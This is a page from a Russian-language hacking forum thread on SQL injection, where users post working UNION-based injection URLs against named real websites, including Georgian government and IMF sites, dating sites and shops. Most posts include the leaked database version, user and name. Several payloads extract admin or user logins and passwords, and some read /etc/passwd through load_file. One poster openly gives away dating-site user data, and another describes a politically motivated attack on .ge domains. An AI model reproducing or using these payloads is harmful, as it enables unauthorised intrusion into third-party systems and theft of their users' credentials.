SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    Code:
    http://www.nawaonline.com/home.php?id=-2/**/union/**/select/**/1,concat%28username_admin,0x3a,password_admin%29,3,4/**/from/**/admin_log_cp--
    
    http://www.alzoma.net/home.php?id=-2/**/union/**/select/**/1,concat%28username_admin,0x3a,password_admin%29,3,4/**/from/**/admin_log_cp--
     
  2. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.renegaderecon.com/review.php?id=-1+union+select+1,2,3,4,5,6,7,8+--+
    
    database:renegaderecon
    version:4.1.14-Debian_5-log
    user:[email protected]
     
  3. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Водка:
    Code:
    http://www.vodkabaikal.ru/gallery.php?pacode=13&phcode=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),version(),database()))),3,4,5,6
    root@localhost:4.1.10a:baykal
    file_priv=Y --->
    Code:
    http://www.vodkabaikal.ru/gallery.php?pacode=13&phcode=-1+union+select+1,load_file(0x2f6574632f706173737764),3,4,5,6
    Тоже водка:
    Code:
    http://visota.artinside.ru/foto_uch.php?code=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,user(),version(),database()))),4,5,6,7,8,9,10,11,12,13,14,15
    [email protected]:5.0.67-log:u22850

    Code:
    http://vladimirmorozov.ru/portfolio/index.php?id_parent=-1+union+select+1,2,3,4,unhex(hex(concat_ws(0x3a,user(),version(),database()))),6,7,8/*
    [email protected]:4.1.18:wwwmvstudioru_vm

    Code:
    http://dfrealty.ru/showhousecart.php?code=224+and+ascii(substring(version(),1,1))=53--
    chr(53) == '5'; ---> пятая ветка

    P.S. Все сайты одной студии, дырявы, как решето.
     
    6 people like this.
  4. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    Code:
    http://dirac.phys.ncku.edu.tw/stats/?year=kaMtiEz&month=tukulesto&mday=-15+union+all+select+@@version,user%28%29--
    
    [COLOR=Green]5.1.37-1ubuntu5[/COLOR]
     
  5. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    PR: 0
    ТИЦ: 10

    _http://www.playonline.com.ua/game.php?id=208)+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9+--+
     
    2 people like this.
  6. whynotbar

    whynotbar New Member

    Joined:
    13 Oct 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://aodaihanghai.vn/news_detail.php?lang=&menu=23&id=-93%20UNION%20ALL%20SELECT%201, 2,3,4,5,6,7,8,9,10,11,12,13--
    Tables :

     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.societatedurabila.ro/index.php?id=9+union+select+concat_ws(0x3a,version(),user(),database(),@@version_compile_os)



    Database Version: 4.1.22-standard
    Database name: holcim_new_en
    User name: doru@localhost
    Os: pc-linux-gnu
     
    3 people like this.
  8. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    flirtdosug.ru PR-2 ТИЦ-10

    Code:
    http://flirtdosug.ru/onlinetest/tests.php?id=-1+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,4,5+--+
    Code:
    5.0.26-log:promocom_test@localhost:promocom_test
     
    1 person likes this.
  9. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Дэйтинг DE,крайне востребован на данный момент.

    www.single-basar.de

    http://www.single-basar.de/profiles.php?id_unternehmen=-112+union+select+count(email),2,3,4,5,6,7,8,9,10,11,12,13+from+users--+&Branche=&Bundesland=

    Пятая ветка, таблицы и поля сдампить самому, кому надо =) Мало людей, всего 531 человек.

    www.flirtpool.de

    http://www.flirtpool.de/go4/thema.php?id=-31795+union+select+1,2,3,4,5,6,concat_ws(0x3A3a,id,name,email,passwort),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+foren_accounts/*

    Тут поболее, 10,589 юзеров. Халява,дарю =)

    А®ТеS
    Будь добр, стукни плз. в пм с номером аськи. Необходима твоя консультация в некоторых вопросах.Не бесплатно конечно+предоставлю возможность зарабатывать неплохо на постоянке,при минимуме временных затрат.Один не справляюсь.
    Любо кто нибудь из мониторящих тему,с опытом и регой. Нужен 1 человек.Рекоммендации, отзывы и т.д. предоставлю в аську при необходимости.
     
    1 person likes this.
  10. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Code:
    http://jeffherbeck.com/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),load_file(0x2F6574632F706173737764),6+from+mysql.user+--+
    5.0.77 : root@localhost : localhost : root : : Y
     
    2 people like this.
  11. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    buychaosmen.com pr2
    Code:
    http://buychaosmen.com/product_info.php?products_id=-768'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+
    videogamesplus.ca pr4
    Code:
    http://www.videogamesplus.ca/pollbooth.php?op=results&pollid=-173+union+select+1+--+
    archive.ketchikandailynews.com
    Code:
    http://archive.ketchikandailynews.com/pollBooth.php?op=results&pollID=-41+union+select+unhex(hex(id)),2,3,4+from+users+--+
    discountcandleshop.com pr4
    Code:
    http://www.discountcandleshop.com/product_info.php?products_id=-2528+union+select+1+--+
    hobbycenter.by pr4
    Code:
    http://www.hobbycenter.by/pollbooth.php?op=results&pollid=-8+union+select+1+--+&page=127'&language=ru'
    abreathforlife.org
    Code:
    http://www.abreathforlife.org/fundraising_view.html?ItemID=-15'+union+select+1,2,3,4,5,6,7,8,9,10,11+from+information_schema.tables+--+
    bimbibo.it pr5
    Code:
    http://www.bimbibo.it/sections.php?op=viewarticle&artid=-238+union+select+1,2,3,concat_ws(0x3a3a,aid,name,pwd),5,6+from+authors+limit+2,1+--+
    startrek.pl pr4
    Code:
    http://www.startrek.pl/pollBooth.php?pollID=-36+union+select+concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),2+from+nuke_authors+--+
    bis-nk.ru
    Code:
    http://www.bis-nk.ru/catalog/?i=6+union+select+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+--+
    rus-zfond.ru
    Code:
    http://www.rus-zfond.ru/zfond/vacancy.php?id=-1928+union+select+1,concat_ws(0x3a3a,name,pass,uid,permiss),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users+--+
    dverinabiz.spb.ru
    Code:
    http://dverinabiz.spb.ru/?mod=1&id=1639024187&parent_id=-704343390+union+select+1,2,3+from+information_schema.tables+--+
    old.nv-sv.ru
    Code:
    http://old.nv-sv.ru/catalog.php?mod=1&id=&parent_id=-427136016+union+select+1,2,3+--+
    educasource.cndp.fr pr6
    Code:
    http://www.educasource.cndp.fr/detail.asp?ID=138794&IDSelection=-56586+union+select+1,table_name+from+information_schema.tables+--+
    newsensations.com pr4
    Code:
    http://newsensations.com/distro/catalog.php?movie=-128+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
    sport.infotree.ru pr3 tic 300
    Code:
    http://sport.infotree.ru/index.php?m=clause&action=preview_clause&id_cl_cat=2&id_clause=-6+union+select+concat_ws(0x3a3a,e_name)+from+information_schema.tables+--+
    teslacenter.ru pr3
    Code:
    http://www.teslacenter.ru/modules/galary/galary.php?do=2&idimg=-12+union+select+1,2,3,database()+--+
    antispam.ru pr5 tic 475
    Code:
    http://www.antispam.ru/sh?act=msg&id=-1096031090'+union+select+1,2,pass,4,5,6,login+from+users+--+
    technokhleb.ru pr4
    Code:
    http://www.technokhleb.ru/cat_section.php?id_level=-3138+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+information_schema.tables+--+&var=1
    sten-mat.ru pr3
    Code:
    http://sten-mat.ru/?page=catbig&goods=2&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+--+
    havana.ru pr3
    Code:
    http://www.havana.ru/shop.php?brandid=-106+union+select+1,group_concat(table_name)+from+information_schema.tables+group+by+table_schema+--+
    hawthornpress.com pr4
    Code:
    http://www.hawthornpress.com/book.php?isbn=-9781903458327+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+/*+
     
    2 people like this.
  12. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    http://www.bluetoothclub.ru/bc.php?Id=-1)+UNION+SELECT+concat(VERSION(),0x3a,USER(),0x3a,DATABASE())%23
    ========
    ололо, чо ты делал на том сайте
     
    #11392 Ponchik, 10 Feb 2010
    Last edited: 10 Feb 2010
    2 people like this.
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.itar-tasskuban.ru/news.php?news=-2302'+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)/*


    Database Version: 4.0.26-log
    Database name: udb4898
    User name: Uwww4898S@localhost
    Os : portbld-freebsd4.10
     
  14. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    http://www.diablo-ii.ru/index.php?option=com_remository&Itemid=S&func=selectcat&cat=-9/**/union/**/select/**/0,0,0,0,concat_ws%280x3a,username,password,usertype%29,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2/**/from/**/mos_users/**/where/**/usertype%20!=%27%27/*
     
    1 person likes this.
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.pets.by/articles.php?id=-1+Union+select+1,2,3,4,5+--+
    
    database: petsby_pet
    user: petsby_pet@localhost
    version: 5.0.45-log

    Code:
     http://www.aids.by/article.php?lib_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8+--+
    user: aidsby@localhost
    version: 5.0.51a-24+lenny1-log
    database: aidsby
     
    #11395 Seravin, 11 Feb 2010
    Last edited: 11 Feb 2010
  16. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    ПРЕВЕД, Грузия!

    Вступление:

    Сижу я как-то на лекции и обсуждаем всякую дрянь (политику). Наверное ничего примечательного бы не произошло, если бы 2 грузиночки, сидящие неподалеку от меня, не открыли тему войны, а в частности, Грузия vs. Южная Осетия... Цитата: "Почему Россия всегда ВМЕШИВАЕТСЯ в дела Грузии? Южная Осетия это наша территория..." и тд. и тп. Ну, что поделаешь, когда государство тупо, по американскому образцу, промывает своим гражданам головы? Они не виноваты, но вот их правительство... И я решил, как могу, если не наказать, то по крайней мере навредить домену .ge (не бесцельно, а наехав на госструктуры). Результат моей самоотверженной работы:

    http://www.gvg.ge/
    (проект здравоохранения Грузии, финансируемый Европейским Союзом)

    HTML:
    http://www.gvg.ge/pages.php?pid=-2'+UNION+SELECT+1,2,concat_ws(0x3a,user(),database(),version())+--+
    Code:
    gvg@localhost:gvg:4.0.27
    HTML:
    http://www.gvg.ge/pages.php?pid=-2'+UNION+SELECT+1,2,concat_ws(0x3a,username,password)+FROM+admin+--+

    http://imf.ge/
    (представительство Международного Валютного Фонда в Грузии)

    HTML:
    http://imf.ge/view2.php?lang=2&view=-415+UNION+SELECT+concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8+FROM+admin+--+
    Code:
    xml@localhost:xml:4.0.27
    HTML:
    http://imf.ge/view2.php?lang=2&view=-415+UNION+SELECT+concat_ws(0x3a,user,pass),2,3,4,5,6,7,8+FROM+admin+--+
     
    #11396 ~EviL~, 11 Feb 2010
    Last edited by a moderator: 11 Feb 2010
    3 people like this.
  17. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Белорусская федерация легкой атлетики)
    Code:
    http://www.bfla.eu/index.php?action=page&id_page=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
    
    database: bflaeu
    version: 5.0.51a-24+lenny1-log
    user: bflaeu@localhost

    Кадровое агенство)))
    Code:
    http://www.ko.by/index.php?page=6&id=-1+union+select+1,2,3,4+--+
    
    user: root@localhost
    version: 5.0.41:
    database: konet
     
    #11397 Seravin, 11 Feb 2010
    Last edited by a moderator: 11 Feb 2010
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.cl.by/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
    
    version: 5.0.81-COMMUNITY-LOG
    database: MULTICOM_MAIN
    user: MULTICOM_ALEX@LOCALHOST
     
  19. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.ios.by/remont/job/vacanse_res.php?id=-1+UNION+SELECT+1,2,3,version(),database(),user(),7,8,9,10,11,12,13+--+
    
    database: iosby_db1
    user: iosby_user@localhost
    version: 5.0.86-percona-highperf-b19
     
  20. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    www.koolance.com

    HTML:
    http://www.koolance.com/water-cooling/product_info.php?product_id=489+union+select+table_name+from+information_schema.tables+limit+0,1+--+
    www.davidmorgan.com

    HTML:
    http://www.davidmorgan.com/product_info.php?products_id=805+union+select+1,2,3,4,5,6,7,8,9,10+limit+0,1+--+
     
    #11400 Дирижабль, 12 Feb 2010
    Last edited: 12 Feb 2010
    1 person likes this.
Thread Status:
Not open for further replies.